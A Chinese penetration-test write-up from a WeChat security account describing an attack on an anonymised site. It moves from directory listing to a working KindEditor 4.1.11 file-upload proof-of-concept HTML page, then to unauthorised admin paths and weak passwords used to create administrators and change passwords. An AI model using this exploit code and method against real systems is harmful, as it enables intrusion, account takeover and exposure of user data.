一、信息收集
目标系统:xxx.xxx.xxx.xxx
利用Wappalyzer查看网站的基本信息如下
然后通过dirsearch进行目录扫描
其中有用的目录信息如下
/Admin/Index
/content/
/upload/
其中/Admin/Index为网站管理后台
二、目录浏览漏洞
在目录/content/和/upload/处发现存在目录浏览漏洞,显示如下
既然有东西,那就可以继续深入下去,左翻右翻终于在/content/V1/目录下看到了kindeditor
三、kindeditor文件上传漏洞
查看kindeditor的版本
在kindeditor-all.js中标明了所使用的的版本
可以看到是4.1.11版本的,刚好这个版本是存在文件上传漏洞的,详情请看下一篇漏洞复现文章
这里直接进行poc利用,在本地新建一个html文件,代码如下
<html>
<head>
<title>Uploader</title>
<script src="http://www.xxxx.cn/Content/V1/kindeditor/kindeditor-all.js"></script>
<script>
KindEditor.ready(function (K) {
var uploadbutton = K.uploadbutton({
button: K('#uploadButton')[0],
fieldName: 'imgFile',
url: 'http://www.xxxx.cn/Content/V1/kindeditor/asp.net/upload_json.ashx?dir=file',
afterUpload: function (data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);
}
},
});
uploadbutton.fileBox.change(function (e) {
uploadbutton.submit();
});
});
</script>
</head>
<body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>
<input type="button" id="uploadButton" value="Upload"/>
</div>
</body>
</html>
浏览器访问显示如下
随便上传一个测试的html验证漏洞存在
可以看到返回了上传文件的地址,访问显示如下
四、未授权访问漏洞
你以为到这里这次渗透测试就结束了么,nonono。前面通过目录扫描可以看到有几个302的跳转都跳转到后台管理首页了,但是直接访问时发现事实并不是那么回事,反倒发现了新大陆
/modules
/news
/redis
/solutions
/users
通过对这几个路径的访问,发现存在未授权访问,比如
其中/users还泄露了用户信息
盲猜这里的工号就是用户名,后面发现还存在弱口令,与用户名相同。进入后台显示如下
进入后台后对其功能点进行测试发现,未授权的地方还不止泄露敏感信息这一点,还可以创建系统管理员、更改用户密码、增删改查文章内容等
http://www.xxxx.cn/Users/Add
http://www.xxxx.cn/Users/UserPwd/106
http://www.xxxx.cn/Users/UserInfo/106
http://www.xxxx.cn/Recruitment/Index
http://www.xxxx.cn/Recruitment/Edit/11
展示个人信息这里可以遍历用户
至此,渗透过程就结束了,又是收获满满的一天啊。得出一个结论那就是,目录扫描出来的结果不管302还是200都去访问一下看看,说不定就柳暗花明又一村了呐。
原文始发于微信公众号(守卫者安全):从目录浏览到文件上传和未授权漏洞的简单渗透过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论